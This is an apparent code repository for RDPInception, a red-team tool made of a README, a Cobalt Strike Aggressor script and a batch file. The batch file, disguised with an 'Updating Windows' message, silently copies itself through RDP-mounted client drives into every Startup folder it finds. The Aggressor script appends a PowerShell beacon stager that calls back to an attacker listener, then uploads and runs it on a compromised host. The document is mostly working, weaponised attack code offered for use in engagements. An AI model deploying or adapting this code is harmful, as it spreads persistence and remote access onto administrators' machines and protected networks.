├── README.md ├── rdpinception.cna └── run.bat /README.md: -------------------------------------------------------------------------------- 1 | Disclaimer 2 | ========== 3 | As usual, this code and tool should not be used for malicious purposes. 4 | 5 | WARNING 6 | ======= 7 | This code is weaponised but with no damage. Do not execute if you are not aware of the consequences or what this code does. 8 | 9 | Credits 10 | ======= 11 | Authored by Vincent Yiu (@vysecurity) of MDSec ActiveBreach 12 | 13 | RDPInception 14 | ============ 15 | 16 | A bat script that will backdoor the host that is mounting drives whilst RDPing into an infected machine. This process repeats if a systems administrator is for example: Laptop -> RDP -> RDP -> RDP -> RDP -> Server. 17 | 18 | The intention of this script is to allow security testers and red teamers to obtain code execution in the management network or a segregated part of the network where the target machine cannot communicate back out to the privileged network context. 19 | 20 | We have found this attack useful in some of our red team and adversary simulation engagements. 21 | 22 | 23 | Aggressor Script 24 | ================ 25 | 1) Load RDPInception 26 | 2) Run rdpinception command 27 | 3) Select HTTP, HTTPS or DNS beacon that can egress. 28 | 29 | Usage 30 | ===== 31 | 1) Modify batch file to execute PowerShell stager, EXE or even DLL. 32 | 2) Upload to the target, execute. -------------------------------------------------------------------------------- /rdpinception.cna: -------------------------------------------------------------------------------- 1 | # RDPInception 2 | # 3 | # Written by Vincent Yiu @vysecurity 4 | 5 | 6 | alias rdpinception { 7 | rdpincept($1,$2); 8 | } 9 | 10 | sub rdpincept { 11 | $beacon = $1; 12 | $domain = $2; 13 | # Force select a payload 14 | openPayloadHelper(lambda({ 15 | $listener = $1; 16 | blog($beacon, "RDPIncepting listener: $listener"); 17 | $buffer = "@echo off\r\n"; 18 | 19 | $buffer = $buffer . "timeout 1 >nul 2>&1\r\n"; 20 | 21 | $buffer = $buffer . "mkdir \\\\tsclient\\c\\temp >nul 2>&1\r\n"; 22 | $buffer = $buffer . "mkdir C:\\temp >nul 2>&1\r\n"; 23 | 24 | $buffer = $buffer . "copy run.bat C:\\temp >nul 2>&1\r\n"; 25 | $buffer = $buffer . "copy run.bat \\\\tsclient\\c\\temp >nul 2>&1\r\n"; 26 | 27 | $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n"; 28 | 29 | $buffer = $buffer . "set dirs=dir /a:d /b /s C:\\users\\*Startup*\r\n"; 30 | $buffer = $buffer . "set dirs2=dir /a:d /b /s \\\\tsclient\\c\\users\\*startup*\r\n"; 31 | 32 | $buffer = $buffer . "echo|%dirs%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n"; 33 | $buffer = $buffer . "echo|%dirs2%|findstr /i \"Microsoft\\Windows\\Start Menu\\Programs\\Startup\">>\"%TEMP%\\temp_00.txt\"\r\n"; 34 | 35 | $buffer = $buffer . "for /F \"tokens=*\" %%a in (%TEMP%\\temp_00.txt) DO (\r\n"; 36 | $buffer = $buffer . " copy run.bat \"%%a\" >nul 2>&1\r\n"; 37 | $buffer = $buffer . " copy C:\\temp\\run.bat \"%%a\" >nul 2>&1\r\n"; 38 | $buffer = $buffer . " copy \\\\tsclient\\c\\temp\\run.bat \"%%a\" >nul 2>&1\r\n"; 39 | $buffer = $buffer . ")\r\n"; 40 | 41 | $buffer = $buffer . "del /q %TEMP%\\temp_00.txt >nul 2>&1\r\n"; 42 | 43 | # Keying by Domain 44 | 45 | if ($domain){ 46 | $buffer = $buffer . "If \"" . $domain . "\"==\"%USERDOMAIN%\" ("; 47 | $buffer = $buffer . powershell($listener, false) . ")"; 48 | } 49 | else{ 50 | $buffer = $buffer . powershell($listener, false); 51 | } 52 | 53 | blog($beacon, $buffer); 54 | 55 | blog($beacon, "Infecting machine with RDPInception."); 56 | bmkdir($beacon, "C:\\temp"); 57 | bupload_raw($beacon, "C:\\temp\\run.bat", $buffer); 58 | 59 | blog($beacon, "Executing RDPInception from C:\\temp\\run.bat"); 60 | bshell($beacon, "C:\\temp\\run.bat"); 61 | 62 | }, $bids => $1)); 63 | 64 | } 65 | 66 | beacon_command_register("rdpinception", "Infects the machine with RDPInception", 67 | "Synopsis: rdpinception [DOMAIN Key]\n\n" . 68 | "Infects the machine with RDPInception, a HTTP, HTTPS or DNS payload that can egress is recommended."); -------------------------------------------------------------------------------- /run.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | echo Updating Windows ... 4 | 5 | @echo off 6 | timeout 1 >nul 2>&1 7 | 8 | mkdir \\tsclient\c\temp >nul 2>&1 9 | mkdir C:\temp >nul 2>&1 10 | 11 | copy run.bat C:\temp >nul 2>&1 12 | copy run.bat \\tsclient\c\temp >nul 2>&1 13 | 14 | del /q %TEMP%\temp_00.txt >nul 2>&1 15 | 16 | set dirs=dir /a:d /b /s C:\users\*Startup* 17 | set dirs2=dir /a:d /b /s \\tsclient\c\users\*startup* 18 | 19 | echo|%dirs%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt" 20 | echo|%dirs2%|findstr /i "Microsoft\Windows\Start Menu\Programs\Startup">>"%TEMP%\temp_00.txt" 21 | 22 | for /F "tokens=*" %%a in (%TEMP%\temp_00.txt) DO ( 23 | copy run.bat "%%a" >nul 2>&1 24 | copy C:\temp\run.bat "%%a" >nul 2>&1 25 | copy \\tsclient\c\temp\run.bat "%%a" >nul 2>&1 26 | ) 27 | 28 | del /q %TEMP%\temp_00.txt >nul 2>&1 29 | 30 | 31 | REM if "WINDOMAIN"="%USERDOMAIN%"( powershell.exe ) --------------------------------------------------------------------------------